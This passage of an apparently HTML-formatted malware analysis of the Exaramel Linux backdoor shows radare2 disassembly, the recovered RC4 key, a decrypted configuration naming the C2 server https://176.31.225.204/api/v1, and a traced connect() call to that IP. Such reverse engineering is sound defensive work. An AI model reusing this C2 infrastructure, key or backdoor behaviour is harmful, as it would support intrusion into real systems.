<li class="li1"><div class="de1">| rg<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fad00</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword fs<span class="sy0">:</span><span class="br0">&#91;</span><span class="nu0">0xfffffffffffffff8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fad09</span> &nbsp; &nbsp; &nbsp;cmp rsp<span class="sy0">,</span> qword <span class="br0">&#91;</span>rcx <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">,=&lt;</span> <span class="nu0">0x005fad0d</span> &nbsp; &nbsp; &nbsp;jbe <span class="nu0">0x5fadee</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fad13</span> &nbsp; &nbsp; &nbsp;sub rsp<span class="sy0">,</span> <span class="nu0">0x40</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span> <span class="co1">---------------------------</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fe1b1</span> &nbsp; &nbsp; &nbsp;<span class="kw3">call</span> sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>proxyAuth <span class="sy0">;</span><span class="br0">&#91;</span><span class="nu0">1</span><span class="br0">&#93;</span> M<span class="sy0">=======</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fe1b6</span> &nbsp; &nbsp; &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_4b0h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fe1bb</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_4b8h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x005fe1c0</span> &nbsp; &nbsp; &nbsp;test rax<span class="sy0">,</span> rax</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; <span class="sy0">,=&lt;</span> <span class="nu0">0x005fe1c3</span> &nbsp; &nbsp; &nbsp;jne <span class="nu0">0x5ff1c6</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__Transport_<span class="sy0">.</span>dialConn @ <span class="nu0">0x5ff1fa</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1c9</span> &nbsp; &nbsp; &nbsp;lea rax<span class="sy0">,</span> <span class="br0">&#91;</span><span class="nu0">0x0068f0a0</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1d0</span> &nbsp; &nbsp; &nbsp;mov qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span><span class="sy0">,</span> rax</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1d4</span> &nbsp; &nbsp; &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_300h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1dc</span> &nbsp; &nbsp; &nbsp;mov qword <span class="br0">&#91;</span>var_4b8h<span class="br0">&#93;</span><span class="sy0">,</span> rax</div></li>
<li class="li1"><div class="de1">| &nbsp; &nbsp; &nbsp; | &nbsp; <span class="nu0">0x005fe1e1</span> &nbsp; &nbsp; &nbsp;mov rcx<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_2f8h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span><span class="co1">-- sym.go.net_http.__Transport_.dialConn:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda2d</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda58</span> int64_t arg1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda5c</span> int64_t arg2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda6e</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454fa4 fcn<span class="sy0">.</span>00454fa4</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda7b</span> <span class="kw3">call</span> sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>key</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda80</span> int64_t arg2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda85</span> int64_t arg1</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fda97</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454f96 fcn<span class="sy0">.</span>00454f96</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdab4</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdb69</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdbad</span> int64_t arg2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdbbf</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454f96 fcn<span class="sy0">.</span>00454f96</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdc8f</span> <span class="kw3">call</span> sym<span class="sy0">.</span>net_http_httptrace<span class="sy0">.</span>ContextClientTrace</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdd41</span> <span class="kw3">call</span> sym<span class="sy0">.</span>net_http<span class="sy0">.</span>__connectMethod_<span class="sy0">.</span>addr <span class="sy0">;</span><span class="st0">&quot;tcp -&gt; &nbsp;&lt;== ==&gt; @@@ MB) <span class="es1">\r</span><span class="es1">\t</span><span class="es1">\n</span> as &nbsp;at &nbsp;fp= in &nbsp;is &nbsp;lr: of &nbsp;on &nbsp;pc= sp: sp=!= 0%x<span class="es1">\r</span><span class="es1">\n</span>&amp;gt;&amp;lt;'<span class="es1">\'</span>&quot;</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdd7d</span> <span class="kw3">call</span> rcx</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fde21</span> <span class="kw3">call</span> sym<span class="sy0">.</span>crypto_tls<span class="sy0">.</span>__Conn_<span class="sy0">.</span>Handshake</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fde70</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newproc</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdeeb</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454f34 fcn<span class="sy0">.</span>00454f34</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdf17</span> <span class="kw3">call</span> rbx</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdf29</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x005fdf47</span> <span class="kw3">call</span> sym<span class="sy0">.</span>crypto_tls<span class="sy0">.</span>__Conn_<span class="sy0">.</span>ConnectionState</div></li>
<li class="li1"><div class="de1"><span class="co1">--- end ---</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> drop config</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">openat<span class="br0">&#40;</span>AT_FDCWD<span class="sy0">,</span> <span class="st0">&quot;{current dir}config.json&quot;</span><span class="sy0">,</span> <span class="nu0">1</span>|<span class="nu0">2</span>|<span class="nu0">0</span>|<span class="nu0">0</span><span class="sy0">,</span> <span class="nu0">0666</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span> <span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> <span class="kw3">write</span> data from below <span class="kw2">and</span> encrypting<span class="sy0">...</span><span class="br0">&#40;</span><span class="kw3">call</span><span class="sy0">:</span> go crypto RC4 library<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006f9990</span> &nbsp;<span class="nu0">6874</span> <span class="nu0">7470</span> 733a 2f2f <span class="nu0">3137</span> 362e <span class="nu0">3331</span> <span class="nu0">2e32</span> &nbsp;https<span class="sy0">://</span>176<span class="sy0">.</span>31<span class="sy0">.</span>2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006f99a0</span> &nbsp;<span class="nu0">3235</span> <span class="nu0">2e32</span> <span class="nu0">3034</span> 2f61 <span class="nu0">7069</span> 2f76 <span class="nu0">3100</span> <span class="nu0">0000</span> &nbsp;<span class="nu0">25.204</span><span class="sy0">/</span>api<span class="sy0">/</span>v1<span class="sy0">...</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> encryption key <span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="kw2">in</span><span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x006da25a</span> <span class="br0">&#91;</span>xAdvc<span class="br0">&#93;</span><span class="nu0">0</span> <span class="nu0">37</span><span class="sy0">%</span> <span class="nu0">16384</span> Exaramel<span class="br0">&#93;</span><span class="sy0">&gt;</span> pd $r @ hit2_0</div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> DATA XREFS from sym<span class="sy0">.</span>main<span class="sy0">.</span>main @ <span class="nu0">0x647823</span><span class="sy0">,</span> <span class="nu0">0x6486eb</span> &nbsp;</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x00647787</span> &nbsp; &nbsp; &nbsp;488d8c249800<span class="sy0">.</span> &nbsp;lea rcx<span class="sy0">,</span> <span class="br0">&#91;</span>var_98h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x0064778f</span> &nbsp; &nbsp; &nbsp;48898c24b002<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>var_2b0h<span class="br0">&#93;</span><span class="sy0">,</span> rcx</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x00647797</span> &nbsp; &nbsp; &nbsp;<span class="nu0">48890424</span> &nbsp; &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span><span class="sy0">,</span> rax</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x0064779b</span> &nbsp; &nbsp; &nbsp;488d8c247802<span class="sy0">.</span> &nbsp;lea rcx<span class="sy0">,</span> <span class="br0">&#91;</span>var_278h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477a3</span> &nbsp; &nbsp; &nbsp;48894c2408 &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_8h<span class="br0">&#93;</span><span class="sy0">,</span> rcx</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477a8</span> &nbsp; &nbsp; &nbsp;48c744241004<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>var_10h<span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">4</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477b1</span> &nbsp; &nbsp; &nbsp;48c744241804<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>var_18h<span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">4</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477ba</span> &nbsp; &nbsp; &nbsp;e8e1defcff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>os_signal<span class="sy0">.</span>Notify</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477bf</span> &nbsp; &nbsp; &nbsp;488b84242001<span class="sy0">.</span> &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_120h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477c7</span> &nbsp; &nbsp; &nbsp;<span class="nu0">4889442410</span> &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_10h<span class="br0">&#93;</span><span class="sy0">,</span> rax </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477cc</span> &nbsp; &nbsp; &nbsp;488b84244001<span class="sy0">.</span> &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_140h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477d4</span> &nbsp; &nbsp; &nbsp;<span class="nu0">4889442418</span> &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_18h<span class="br0">&#93;</span><span class="sy0">,</span> rax </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477d9</span> &nbsp; &nbsp; &nbsp;488b8c244801<span class="sy0">.</span> &nbsp;mov rcx<span class="sy0">,</span> qword <span class="br0">&#91;</span>var_148h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477e1</span> &nbsp; &nbsp; &nbsp;48894c2420 &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_20h<span class="br0">&#93;</span><span class="sy0">,</span> rcx </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477e6</span> &nbsp; &nbsp; &nbsp;c70424180000<span class="sy0">.</span> &nbsp;mov dword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">0x18</span> </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477ed</span> &nbsp; &nbsp; &nbsp;488d1534160a<span class="sy0">.</span> &nbsp;lea rdx<span class="sy0">,</span> <span class="br0">&#91;</span><span class="nu0">0x006e8e28</span><span class="br0">&#93;</span> </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477f4</span> &nbsp; &nbsp; &nbsp;<span class="nu0">4889542408</span> &nbsp; &nbsp; mov qword <span class="br0">&#91;</span>var_8h<span class="br0">&#93;</span><span class="sy0">,</span> rdx </div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477f9</span> &nbsp; &nbsp; &nbsp;e8729cdeff &nbsp; &nbsp; <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newproc</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x006477fe</span> &nbsp; &nbsp; &nbsp;488b05c3e71d<span class="sy0">.</span> &nbsp;mov rax<span class="sy0">,</span> qword <span class="br0">&#91;</span><span class="nu0">0x00825fc8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x00647805</span> &nbsp; &nbsp; &nbsp;4885c0 &nbsp; &nbsp; &nbsp; &nbsp; test rax<span class="sy0">,</span> rax </div></li>
<li class="li1"><div class="de1">│ &nbsp;┌─<span class="sy0">&lt;</span> <span class="nu0">0x00647808</span> &nbsp; &nbsp; &nbsp;<span class="nu0">7527</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jne <span class="nu0">0x647831</span> &nbsp;</div></li>
<li class="li1"><div class="de1">│ &nbsp;│ &nbsp; &nbsp;<span class="nu0">0x0064780a</span> &nbsp; &nbsp; &nbsp;48c705b3e71d<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span><span class="nu0">0x00825fc8</span><span class="br0">&#93;</span><span class="sy0">,</span> <span class="nu0">0xa</span> </div></li>
<li class="li1"><div class="de1">│ &nbsp;│ &nbsp; &nbsp;<span class="nu0">0x00647815</span> &nbsp; &nbsp; &nbsp;8b0515bf1f00 &nbsp; mov eax<span class="sy0">,</span> dword <span class="br0">&#91;</span>obj<span class="sy0">.</span>runtime<span class="sy0">.</span>writeBarrier<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp;│ &nbsp; &nbsp;<span class="nu0">0x0064781b</span> &nbsp; &nbsp; &nbsp;85c0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test eax<span class="sy0">,</span> eax </div></li>
<li class="li1"><div class="de1">│┌──<span class="sy0">&lt;</span> <span class="nu0">0x0064781d</span> &nbsp; &nbsp; &nbsp;0f85bd0e0000 &nbsp; jne <span class="nu0">0x6486e0</span> &nbsp;</div></li>
<li class="li1"><div class="de1">│││ &nbsp; &nbsp;<span class="nu0">0x00647823</span> &nbsp; &nbsp; &nbsp;488d05302a09<span class="sy0">.</span> &nbsp;lea rax<span class="sy0">,</span> <span class="br0">&#91;</span>hit2_0<span class="br0">&#93;</span> <span class="sy0">;</span> <span class="nu0">0x6da25a</span> <span class="sy0">;</span> <span class="st0">&quot;s0m3t3rr0r&quot;</span> <span class="sy0">&lt;======</span>KEY!!</div></li>
<li class="li1"><div class="de1">│││ &nbsp; &nbsp;<span class="nu0">0x0064782a</span> &nbsp; &nbsp; &nbsp;4889058fe71d<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>obj<span class="sy0">.</span>main<span class="sy0">.</span>key<span class="br0">&#93;</span><span class="sy0">,</span> rax </div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006da25a</span> <span class="br0">&#91;</span>xAdvc<span class="br0">&#93;</span><span class="nu0">0</span> <span class="nu0">37</span><span class="sy0">%</span> <span class="nu0">16384</span> Exaramel<span class="br0">&#93;</span><span class="sy0">&gt;</span> ps </div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006da25a</span> <span class="sy0">&lt;</span>nil<span class="sy0">&gt;</span>runtime<span class="sy0">:</span> s0m3t3rr0r<span class="br0">&#40;</span><span class="sy0">++</span>junk<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> config</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">~<span class="sy0">/</span>test$ r2 config<span class="sy0">.</span>json </div></li>
<li class="li1"><div class="de1">&nbsp;<span class="co1">-- Invert the block bytes using the 'I' key in visual mode</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00000000</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> px</div></li>
<li class="li1"><div class="de1"><span class="sy0">-</span> offset <span class="sy0">-</span> &nbsp; <span class="nu0">0</span> <span class="nu0">1</span> &nbsp;<span class="nu0">2</span> <span class="nu0">3</span> &nbsp;<span class="nu0">4</span> <span class="nu0">5</span> &nbsp;<span class="nu0">6</span> <span class="nu0">7</span> &nbsp;<span class="nu0">8</span> <span class="nu0">9</span> &nbsp;A B &nbsp;C D &nbsp;E F &nbsp;0123456789ABCDEF</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000000</span> &nbsp;4f65 e400 ded5 2b33 3a61 37b5 1fd8 ffdf &nbsp;Oe<span class="sy0">....+</span><span class="nu0">3</span><span class="sy0">:</span>a7<span class="sy0">.....</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000010</span> &nbsp;9f57 b918 6d1e e9b8 <span class="nu0">8116</span> <span class="nu0">057f</span> a636 <span class="nu0">08e2</span> &nbsp;<span class="sy0">.</span>W<span class="sy0">..</span>m<span class="sy0">........</span><span class="nu0">6</span><span class="sy0">..</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000020</span> &nbsp;4b5a 15c1 57a1 a0e9 <span class="nu0">1297</span> <span class="nu0">49e8</span> <span class="nu0">2942</span> 8f78 &nbsp;KZ<span class="sy0">..</span>W<span class="sy0">.....</span>I<span class="sy0">.</span><span class="br0">&#41;</span>B<span class="sy0">.</span>x</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000030</span> &nbsp;e267 95ad aead <span class="nu0">0846</span> <span class="nu0">5074</span> d17f 9eab e8c6 &nbsp;<span class="sy0">.</span>g<span class="sy0">.....</span>FPt<span class="sy0">......</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000040</span> &nbsp;7c29 d378 4fd7 <span class="nu0">5071</span> c311 53f5 de02 32d0 &nbsp;|<span class="br0">&#41;</span><span class="sy0">.</span>xO<span class="sy0">.</span>Pq<span class="sy0">..</span>S<span class="sy0">...</span><span class="nu0">2</span><span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000050</span> &nbsp;<span class="nu0">3e93</span> <span class="nu0">45e8</span> de72 a424 70fb <span class="nu0">00e0</span> f30f 5be0 &nbsp;<span class="sy0">&gt;.</span>E<span class="sy0">..</span>r<span class="sy0">.</span>$p<span class="sy0">.....</span><span class="br0">&#91;</span><span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000060</span> &nbsp;37eb 47a9 d57e ebee <span class="nu0">583f</span> 339c <span class="nu0">5672</span> 23c4 &nbsp;<span class="nu0">7</span><span class="sy0">.</span>G<span class="sy0">..</span>~<span class="sy0">..</span>X?<span class="nu0">3</span><span class="sy0">.</span>Vr<span class="sy0">#.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000070</span> &nbsp;adbf d997 2f99 5a7f 063c 9ba5 <span class="nu0">7028</span> 15b7 &nbsp;<span class="sy0">..../.</span>Z<span class="sy0">..&lt;..</span>p<span class="br0">&#40;</span><span class="sy0">..</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000080</span> &nbsp;3ce6 da90 98ae 8c34 f8b2 <span class="nu0">0331</span> a445 d517 &nbsp;<span class="sy0">&lt;......</span><span class="nu0">4</span><span class="sy0">...</span><span class="nu0">1</span><span class="sy0">.</span>E<span class="sy0">..</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00000090</span> &nbsp;a946 173b c506 c450 0f9e 6a48 d068 b6c8 &nbsp;<span class="sy0">.</span>F<span class="sy0">.;...</span>P<span class="sy0">..</span>jH<span class="sy0">.</span>h<span class="sy0">..</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x000000a0</span> &nbsp;ffff ffff ffff ffff ffff ffff ffff ffff &nbsp;<span class="sy0">................</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> the file is encrypted with RC4 with key above<span class="sy0">,</span> decoded with any flavor<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="br0">&#123;</span><span class="st0">&quot;Hosts&quot;</span><span class="sy0">:</span><span class="br0">&#91;</span><span class="st0">&quot;https://176.31.225.204/api/v1&quot;</span><span class="br0">&#93;</span><span class="sy0">,</span><span class="st0">&quot;Proxy&quot;</span><span class="sy0">:</span><span class="st0">&quot;&quot;</span><span class="sy0">,</span><span class="st0">&quot;Version&quot;</span><span class="sy0">:</span><span class="st0">&quot;1&quot;</span><span class="sy0">,</span><span class="st0">&quot;Guid&quot;</span><span class="sy0">:</span><span class="st0">&quot;c65f5f15-2e64-4b41-9c95-59f0d94f5fca&quot;</span><span class="sy0">,</span><span class="st0">&quot;Next&quot;</span><span class="sy0">:</span><span class="nu0">20</span><span class="sy0">,</span><span class="st0">&quot;Datetime&quot;</span><span class="sy0">:</span><span class="st0">&quot;&quot;</span><span class="sy0">,</span><span class="st0">&quot;Timeout&quot;</span><span class="sy0">:</span><span class="nu0">30</span><span class="sy0">,</span><span class="st0">&quot;Def&quot;</span><span class="sy0">:</span><span class="nu0">20</span><span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> c2 </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x6f9990</span> <span class="nu0">30</span> <span class="nu0">29</span> https<span class="sy0">://</span>176<span class="sy0">.</span>31<span class="sy0">.</span>225<span class="sy0">.</span>204<span class="sy0">/</span>api<span class="sy0">/</span>v1</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> you can <span class="kw3">seek</span> callback OS on<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">connect<span class="br0">&#40;</span><span class="nu0">6</span><span class="sy0">,</span> <span class="br0">&#123;</span>sa_family<span class="sy0">=</span>AF_INET<span class="sy0">,</span> sin_port<span class="sy0">=</span>htons<span class="br0">&#40;</span><span class="nu0">443</span><span class="br0">&#41;</span><span class="sy0">,</span> sin_addr<span class="sy0">=</span>inet_addr<span class="br0">&#40;</span><span class="st0">&quot;176.31.225.204&quot;</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> files enumeration <span class="br0">&#40;</span>this happened before C2 networking started per clone<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">getdents64<span class="br0">&#40;</span>$SOCKET<span class="sy0">,</span> <span class="br0">&#123;</span><span class="br0">&#123;</span>d_ino<span class="sy0">=</span>$INODENUM<span class="sy0">,</span> d_off<span class="sy0">=</span>$OFFSETNUM<span class="sy0">,..</span></div></li>
<li class="li1"><div class="de1">loop </div></li>
<li class="li1"><div class="de1">&nbsp;<span class="br0">&#123;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;lstat<span class="br0">&#40;</span><span class="st0">&quot;{$CURRPATH}/{files}&quot;</span><span class="sy0">..</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;openat<span class="br0">&#40;</span>AT_FDCWD<span class="sy0">,</span> <span class="st0">&quot;{$CURRPATH}/{$DIRS}&quot;</span><span class="sy0">..</span></div></li>
<li class="li1"><div class="de1">&nbsp; <span class="br0">&#125;</span></div></li>
<li class="li1"><div class="de1">getdents64<span class="br0">&#40;</span>$SOCKET<span class="sy0">,</span> <span class="br0">&#123;</span><span class="br0">&#125;</span><span class="sy0">,</span> $MMAP<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">close<span class="br0">&#40;</span>$SOCKET<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> Dynamic Analysis &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="sy0">#</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> works<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">00400000</span><span class="sy0">-</span><span class="nu0">00649000</span> r<span class="sy0">-</span>xp <span class="nu0">00000000</span> <span class="nu0">08</span><span class="sy0">:</span><span class="nu0">01</span> <span class="nu0">397381</span> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel</div></li>
